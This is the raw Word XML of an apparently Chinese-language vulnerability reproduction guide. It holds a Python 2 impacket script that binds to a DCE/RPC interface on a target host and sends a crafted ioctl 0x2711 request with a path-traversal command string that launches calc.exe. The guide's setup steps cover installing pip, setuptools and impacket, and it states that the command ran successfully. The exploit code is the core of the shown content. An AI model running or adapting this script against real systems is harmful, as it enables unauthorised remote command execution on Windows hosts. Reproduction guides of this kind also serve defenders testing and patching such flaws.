          <w:p w14:paraId="3B5BEF6C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interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50FCC658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 xml:space="preserve">version = "1.0" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C51FC15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</w:p>
          <w:p w14:paraId="40406A80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host = sys.argv[1]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0242852C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</w:p>
          <w:p w14:paraId="4CFBA633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string_binding = "ncacn_ip_tcp:%s" % host</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D23DBBA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trans = transport.DCERPCTransportFactory(string_binding)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13B16051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trans.set_dport(port)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16C8ACB7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</w:p>
          <w:p w14:paraId="2B969F2E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dce = trans.get_dce_rpc()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C65721D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dce.connect()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AD7AA89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</w:p>
          <w:p w14:paraId="6EB6281A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print "Binding..."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2D61A8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lastRenderedPageBreak/>
              <w:t>iid = uuid.uuidtup_to_bin((interface, version))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31085FBF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dce.bind(iid)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="294DE393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</w:p>
          <w:p w14:paraId="2C20594B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print "...1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="700E5262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stubdata = struct.pack("&lt;III", 0x00, 0xc351, 0x04)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="707B6605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call(dce, 2, stubdata)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4905C7B9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</w:p>
          <w:p w14:paraId="7DCBF26C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print "...2"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="142020DC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stubdata = struct.pack("&lt;I", 0x02)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F9942B5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res = call(dce, 4, stubdata)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25A0E8BB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if res == -1:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="290D12A5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 xml:space="preserve">  print "Something went wrong"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75910D12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 xml:space="preserve">  sys.exit(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58AF502B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res = struct.unpack("III", res)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58A3595C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</w:p>
          <w:p w14:paraId="0DA8132A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if (len(res) &lt; 3):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03F3E596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 xml:space="preserve">  print "Received unexpected length value"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EBB6F3A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 xml:space="preserve">  sys.exit(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37A6E5B4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</w:p>
          <w:p w14:paraId="18C6F7DF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print "...3"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="241FD272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# ioctl 0x2711</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73D92E3C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stubdata = struct.pack("&lt;IIII", res[2], 0x2711, 0x204, 0x204)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DCFB74B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command = "..\\..\\windows\\system32\\calc.exe"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54B7B00E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fmt = "&lt;" + str(0x204) + "s"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25E9F403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stubdata += struct.pack(fmt, command)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B42D249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t>call(dce, 1, stubdata)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D8A0106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</w:p>
          <w:p w14:paraId="62564075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  <w:r w:rsidRPr="004B4D38">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>print "\nDid it work?"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21F3BD52" w14:textId="77777777" w:rsidR="004B4D38" w:rsidRPr="004B4D38" w:rsidRDefault="004B4D38" w:rsidP="004B4D38">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:ind w:firstLine="562"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="30EB47A5" w14:textId="1EB2AD16" w:rsidR="004B4D38" w:rsidRDefault="004B4D38" w:rsidP="004B4D38">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B4D38">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>dce.disconnect()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2295D533" w14:textId="77777777" w:rsidR="004B4D38" w:rsidRDefault="004B4D38">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6194B9" w14:textId="57FC608D" w:rsidR="004C1793" w:rsidRDefault="004C1793" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>【步骤三】</w:t>
      </w:r>
      <w:r w:rsidR="004B4D38" w:rsidRPr="004B4D38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Python2.7</w:t>
      </w:r>
      <w:r w:rsidR="004B4D38" w:rsidRPr="004B4D38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r w:rsidR="004B4D38" w:rsidRPr="004B4D38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEF9234" w14:textId="77777777" w:rsidR="00B2374A" w:rsidRDefault="00B2374A" w:rsidP="00B2374A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3A4145"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="3A4145"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下载工具：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C88CB6" w14:textId="77777777" w:rsidR="00B2374A" w:rsidRDefault="00B2374A" w:rsidP="00B2374A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="3A414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A4145"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件名：setuptools-41.0.1.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CB0852" w14:textId="4D57F4E0" w:rsidR="00B2374A" w:rsidRDefault="006848AD" w:rsidP="00B2374A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="3A4145"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:anchor="files" w:history="1">
        <w:r w:rsidR="00B2374A" w:rsidRPr="00EB6433">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>https://pypi.org/project/setuptools/41.0.1/#files</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="600B0256" w14:textId="77777777" w:rsidR="00B2374A" w:rsidRDefault="006848AD" w:rsidP="00B2374A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="3A4145"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00B2374A">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="E74C3C"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>https://files.pythonhosted.org/packages/1d/64/a18a487b4391a05b9c7f938b94a16d80305bf0369c6b0b9509e86165e1d3/setuptools-41.0.1.zip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21658133" w14:textId="426FABD3" w:rsidR="00B2374A" w:rsidRDefault="00B2374A" w:rsidP="00B2374A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="3A4145"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="3A4145"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B2374A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A4145"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>解压，然后进入目录，然后运行 python setup.py install 命令进行安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A40D7" w14:textId="77777777" w:rsidR="00B2374A" w:rsidRDefault="00B2374A" w:rsidP="00B2374A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="3A414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A4145"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件名：pip-18.1.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6036649A" w14:textId="77777777" w:rsidR="00B2374A" w:rsidRDefault="006848AD" w:rsidP="00B2374A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="3A4145"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId20" w:anchor="files" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00B2374A">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="E74C3C"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>https://pypi.org/project/pip/18.1/#files</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21BE4263" w14:textId="77777777" w:rsidR="00B2374A" w:rsidRDefault="006848AD" w:rsidP="00B2374A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="3A4145"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00B2374A">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="E74C3C"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>https://files.pythonhosted.org/packages/45/ae/8a0ad77defb7cc903f09e551d88b443304a9bd6e6f124e75c0fbbf6de8f7/pip-18.1.tar.gz</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33E149BF" w14:textId="4947FC43" w:rsidR="00C16F11" w:rsidRDefault="00B2374A" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B2374A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A4145"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>解压，然后进入目录，然后运行 python setup.py install 命令进行安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552FDEE2" w14:textId="41CADA29" w:rsidR="00C16F11" w:rsidRDefault="00C16F11" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E202E0A" w14:textId="27F8FCAE" w:rsidR="00B2374A" w:rsidRDefault="00B2374A" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>加入环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16026FE9" w14:textId="0FEEF939" w:rsidR="00B2374A" w:rsidRDefault="00B2374A" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DDBA8C4" w14:textId="4EE655B9" w:rsidR="00B2374A" w:rsidRDefault="00B2374A" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757370F9" w14:textId="68C1E755" w:rsidR="00B2374A" w:rsidRDefault="00B2374A" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D490DA" w14:textId="02C5E765" w:rsidR="00B2374A" w:rsidRDefault="00B2374A" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D4ACC41" w14:textId="398ACD28" w:rsidR="00B2374A" w:rsidRDefault="00B2374A" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CED4589" w14:textId="55914F9E" w:rsidR="00B2374A" w:rsidRDefault="00B2374A" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A838BD" w14:textId="06E89FB1" w:rsidR="00B2374A" w:rsidRDefault="00B2374A" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind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【步骤四】执行脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2542F4FC" w14:textId="04B4C03B" w:rsidR="00B2374A" w:rsidRDefault="00B2374A" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind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35E7B3C3" wp14:editId="60B46C89">
            <wp:extent cx="5274310" cy="29152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E5EB" w14:textId="74F7A1D6" w:rsidR="00B2374A" w:rsidRDefault="006848AD" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidR="00AF11E5" w:rsidRPr="00EB6433">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://github.com/fortra/impacket/releases/download/impacket_0_10_0/impacket-0.10.0.tar.gz</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F5DF940" w14:textId="1506F280" w:rsidR="00AF11E5" w:rsidRDefault="00AF11E5" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>安装此库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4691DF62" w14:textId="5764166B" w:rsidR="00AF11E5" w:rsidRDefault="00AF11E5" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind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2E714EF8" wp14:editId="1E030DA8">
            <wp:extent cx="5274310" cy="37750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E8CE" w14:textId="4CD4352A" w:rsidR="00C56422" w:rsidRDefault="005600C0" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>安装此库可能出现各种报错，已提供涵盖本次漏洞运行库的</w:t>
      </w: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压缩包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348605F7" w14:textId="3506B803" w:rsidR="00C56422" w:rsidRDefault="00D04D32" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind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E633B3" wp14:editId="0B8AC459">
            <wp:extent cx="5274310" cy="34302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0EF9" w14:textId="0CE18031" w:rsidR="00D04D32" w:rsidRDefault="00D04D32" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind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1FF923F" wp14:editId="655E209E">
            <wp:extent cx="5274310" cy="379666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D923" w14:textId="3FC34D68" w:rsidR="00C56422" w:rsidRPr="00AF11E5" w:rsidRDefault="00D04D32" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>成功执行打开计算机命令</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C56422" w:rsidRPr="00AF1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B6325" w14:textId="77777777" w:rsidR="006848AD" w:rsidRDefault="006848AD" w:rsidP="00705A99">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2E7092C0" w14:textId="77777777" w:rsidR="006848AD" w:rsidRDefault="006848AD" w:rsidP="0070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CFB3C" w14:textId="77777777" w:rsidR="006848AD" w:rsidRDefault="006848AD" w:rsidP="00705A99">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="769AB99D" w14:textId="77777777" w:rsidR="006848AD" w:rsidRDefault="006848AD" w:rsidP="00705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3E9BDD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD3E9BD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ViNTMyZTBmYjViOGI3ZGQ5MjhkNjE5MDJlMGJiNTQifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="0078712B"/>
    <w:rsid w:val="000057EA"/>
    <w:rsid w:val="0006000C"/>
    <w:rsid w:val="000E0CFA"/>
    <w:rsid w:val="00131DA4"/>
    <w:rsid w:val="001F15C6"/>
    <w:rsid w:val="0025100D"/>
    <w:rsid w:val="002B32D9"/>
    <w:rsid w:val="002B6FB5"/>
    <w:rsid w:val="002D0B2A"/>
    <w:rsid w:val="002D61F7"/>
    <w:rsid w:val="002E22F7"/>
    <w:rsid w:val="00361277"/>
    <w:rsid w:val="00375CCE"/>
    <w:rsid w:val="003A78D9"/>
    <w:rsid w:val="003C6EF5"/>
    <w:rsid w:val="003F1296"/>
    <w:rsid w:val="004435E1"/>
    <w:rsid w:val="00452910"/>
    <w:rsid w:val="004B0A83"/>
    <w:rsid w:val="004B19B5"/>
    <w:rsid w:val="004B4D38"/>
    <w:rsid w:val="004C1793"/>
    <w:rsid w:val="004D79F3"/>
    <w:rsid w:val="004E1BBB"/>
    <w:rsid w:val="004E4F70"/>
    <w:rsid w:val="004F3E9D"/>
    <w:rsid w:val="00512D3E"/>
    <w:rsid w:val="00516859"/>
    <w:rsid w:val="005600C0"/>
    <w:rsid w:val="005B758B"/>
    <w:rsid w:val="005F1959"/>
    <w:rsid w:val="00627A6A"/>
    <w:rsid w:val="00633A4A"/>
    <w:rsid w:val="006848AD"/>
    <w:rsid w:val="006A1D6C"/>
    <w:rsid w:val="006C2EAA"/>
    <w:rsid w:val="006E30B6"/>
    <w:rsid w:val="006F0165"/>
    <w:rsid w:val="00705A99"/>
    <w:rsid w:val="007801B9"/>
    <w:rsid w:val="00785DEB"/>
    <w:rsid w:val="0078712B"/>
    <w:rsid w:val="007D0BA6"/>
    <w:rsid w:val="007F1F6A"/>
    <w:rsid w:val="00860955"/>
    <w:rsid w:val="00886C87"/>
    <w:rsid w:val="00887D7E"/>
    <w:rsid w:val="00961F8D"/>
    <w:rsid w:val="00963091"/>
    <w:rsid w:val="00992E1C"/>
    <w:rsid w:val="009A6E42"/>
    <w:rsid w:val="009B39E8"/>
    <w:rsid w:val="009E77A9"/>
    <w:rsid w:val="00A00FDD"/>
    <w:rsid w:val="00A061CB"/>
    <w:rsid w:val="00A21148"/>
    <w:rsid w:val="00A609F0"/>
    <w:rsid w:val="00A97EAA"/>
    <w:rsid w:val="00AC0119"/>
    <w:rsid w:val="00AC2EA2"/>
    <w:rsid w:val="00AF11E5"/>
    <w:rsid w:val="00B2374A"/>
    <w:rsid w:val="00B63775"/>
    <w:rsid w:val="00BB6D88"/>
    <w:rsid w:val="00BC4C3E"/>
    <w:rsid w:val="00C14A5F"/>
    <w:rsid w:val="00C16F11"/>
    <w:rsid w:val="00C401EF"/>
    <w:rsid w:val="00C56422"/>
    <w:rsid w:val="00CB0976"/>
    <w:rsid w:val="00D04D32"/>
    <w:rsid w:val="00D102EA"/>
    <w:rsid w:val="00D70244"/>
    <w:rsid w:val="00D727C5"/>
    <w:rsid w:val="00DA3126"/>
    <w:rsid w:val="00DA5227"/>
    <w:rsid w:val="00E24FC3"/>
    <w:rsid w:val="00E33399"/>
    <w:rsid w:val="00E33B3D"/>
    <w:rsid w:val="00E72F81"/>
    <w:rsid w:val="00F01AB3"/>
    <w:rsid w:val="00F524F5"/>
    <w:rsid w:val="00F70684"/>
    <w:rsid w:val="00F82569"/>
    <w:rsid w:val="00FD0FEA"/>
    <w:rsid w:val="021952DC"/>
    <w:rsid w:val="11E06E41"/>
    <w:rsid w:val="15E3766F"/>
    <w:rsid w:val="1D2B18B9"/>
    <w:rsid w:val="1EAB3DBD"/>
    <w:rsid w:val="294206B6"/>
    <w:rsid w:val="29C33735"/>
    <w:rsid w:val="2C573847"/>
    <w:rsid w:val="34960C3E"/>
    <w:rsid w:val="379E56B4"/>
    <w:rsid w:val="39012385"/>
    <w:rsid w:val="3BBD1E25"/>
    <w:rsid w:val="3F8A6B26"/>
    <w:rsid w:val="41EC0D67"/>
    <w:rsid w:val="480D1A37"/>
    <w:rsid w:val="496D3711"/>
    <w:rsid w:val="49D15412"/>
    <w:rsid w:val="4BB430E1"/>
    <w:rsid w:val="535D7D17"/>
    <w:rsid w:val="557F21C6"/>
    <w:rsid w:val="5DC82230"/>
    <w:rsid w:val="63B42170"/>
    <w:rsid w:val="64AD38C1"/>
    <w:rsid w:val="68024591"/>
    <w:rsid w:val="6E042670"/>
    <w:rsid w:val="6FC0720B"/>
    <w:rsid w:val="707D00C0"/>
    <w:rsid w:val="7113443A"/>
    <w:rsid w:val="72C07522"/>
    <w:rsid w:val="797F1E79"/>
    <w:rsid w:val="79A547A7"/>
    <w:rsid w:val="7B5A38B2"/>
    <w:rsid w:val="7DA41F1A"/>
    <w:rsid w:val="7F8D69DE"/>
    <w:rsid w:val="7FE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1DDC38"/>
  <w15:docId w15:val="{9EF1A729-51F5-41CA-B342-21F6F96E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wordWrap w:val="0"/>
      <w:topLinePunct/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0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semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr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10">
    <w:name w:val="正文1"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
      <w:topLinePunct/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLineChars="200" w:firstLine="880"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="仿宋"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a7"/>
    <w:rsid w:val="00705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705A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705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705A9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05A99"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ab">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00705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87D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87D7E"/>
    <w:rPr>
